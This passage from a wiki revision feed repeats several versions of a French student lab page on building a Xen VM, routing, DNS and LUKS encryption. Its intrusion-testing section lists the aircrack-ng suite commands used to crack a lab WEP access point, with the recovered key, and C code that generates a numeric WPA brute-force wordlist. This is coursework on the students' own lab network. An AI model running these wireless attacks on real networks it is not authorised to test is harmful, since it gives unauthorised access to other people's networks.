 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53708</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53708"/>
				<updated>2020-11-16T14:42:59Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Routage du site IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53054</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53054"/>
				<updated>2020-11-02T15:38:03Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
//rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
&lt;br /&gt;
//modif .cfg pour ajouter disques&lt;br /&gt;
&lt;br /&gt;
//transfert fichier /var vers nouvelle partition&lt;br /&gt;
&lt;br /&gt;
//ajoute au /etc/fstab les disques&lt;br /&gt;
&lt;br /&gt;
//mount -a&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0&lt;br /&gt;
3. enable&lt;br /&gt;
4. conf t&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
6. exit&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
accès ssh ok (modif /etc/ssh/sshd_config)&lt;br /&gt;
&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 @	IN	SOA	ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
 			      6		; Serial&lt;br /&gt;
 			 604800		; Refresh&lt;br /&gt;
 			  86400		; Retry&lt;br /&gt;
 			2419200		; Expire&lt;br /&gt;
 			 604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @	IN	NS	ns1.clavaire.site.&lt;br /&gt;
 ns1	IN	A	193.48.57.186&lt;br /&gt;
 www	IN	A       193.48.57.186	&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP === &lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[http://clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53052</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=53052"/>
				<updated>2020-11-02T15:37:19Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.178/28&lt;br /&gt;
 URL : clavaire.site&lt;br /&gt;
&lt;br /&gt;
